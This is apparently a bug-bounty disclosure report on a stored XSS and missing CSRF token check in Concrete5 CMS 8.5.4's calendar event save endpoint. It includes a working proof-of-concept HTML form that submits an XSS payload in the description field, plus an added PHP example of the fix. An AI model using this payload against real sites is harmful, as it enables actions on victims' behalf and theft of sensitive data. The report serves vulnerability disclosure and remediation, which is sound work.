The description parameter of the endpoint /index.php/ccm/calendar/dialogs/event/add/save is affected by stored XSS because user-supplied data is not filtered. It should also be mentioned that this endpoint does not verify the CSRF token ccm_token, which makes it possible to perform a CSRF attack using a specially crafted web page.
Concrete5 CMS version: 8.5.4
PHP Version: 7.2.24
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<YOUR CONCRETE5 TESTING SERVER IP>/index.php/ccm/calendar/dialogs/event/add/save" method="POST">
<input type="hidden" name="caID" value="1" />
<input type="hidden" name="name" value="csrf_xss" />
<input type="hidden" name="description" value="<img src=x onerror=alert(document.domain)>" />
<input type="hidden" name="cID" value="0" />
<input type="hidden" name="event_repetitionSetID[]" value="1234" />
<input type="hidden" name="event_repetitionID_1234" value="0" />
<input type="hidden" name="event_pdStartDate_pub_1234" value="2/12/21" />
<input type="hidden" name="event_pdStartDate_1234" value="2021-02-12" />
<input type="hidden" name="event_pdStartDateSelectTime_1234" value="11:00am" />
<input type="hidden" name="publishAction" value="approve" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
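As an added example (not Concrete5's code and not part of the original report), a minimal PHP save handler that performs the two checks the report identifies as missing: it rejects a request whose ccm_token does not match the session's token and neutralises markup in the description before it is stored. The function names, the random-token scheme and the store-escaped approach are assumptions made for this illustration; Concrete5's own token helper and escaping differ in detail.

```php
<?php
// Added illustration, not Concrete5 code: the two checks the report says the
// event save endpoint lacks (CSRF token verification and filtering of the
// user-supplied description), written as a minimal, self-contained handler.
// Function names, the token scheme and storing the escaped value are
// assumptions for this example.
declare(strict_types=1);

// Server-side token tied to the user's session (simplified stand-in for ccm_token).
function issueCsrfToken(): string {
    return bin2hex(random_bytes(32));
}

// Reject the request unless the submitted token matches the session copy.
// hash_equals() keeps the comparison constant-time.
function validateCsrfToken(string $expected, ?string $submitted): bool {
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

// Neutralise markup so the description renders as text, never as HTML.
// Escaping at output time is the more general fix; escaping here is enough
// to show that the payload from the proof of concept becomes inert.
function sanitizeDescription(string $raw): string {
    return htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened equivalent of the save action: token check first, then filtering.
function saveEvent(array $post, string $sessionToken): array {
    if (!validateCsrfToken($sessionToken, $post['ccm_token'] ?? null)) {
        return ['ok' => false, 'error' => 'invalid or missing ccm_token'];
    }
    return [
        'ok'          => true,
        'name'        => sanitizeDescription((string) ($post['name'] ?? '')),
        'description' => sanitizeDescription((string) ($post['description'] ?? '')),
    ];
}

// Constructed input mirroring the proof-of-concept form: no token, XSS payload.
$sessionToken = issueCsrfToken();
$forged = [
    'name'        => 'csrf_xss',
    'description' => '<img src=x onerror=alert(document.domain)>',
];
var_dump(saveEvent($forged, $sessionToken));   // rejected: ccm_token missing
$forged['ccm_token'] = $sessionToken;
var_dump(saveEvent($forged, $sessionToken));   // accepted, description escaped
```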
This bug was found as a part of Solar Security CMS Research, in collaboration with https://hackerone.com/d0bby, https://hackerone.com/wezery0 and https://hackerone.com/silvereniqma. Can you please add them to this report?
A malicious attacker can potentially obtain sensitive information or perform actions on the user's behalf.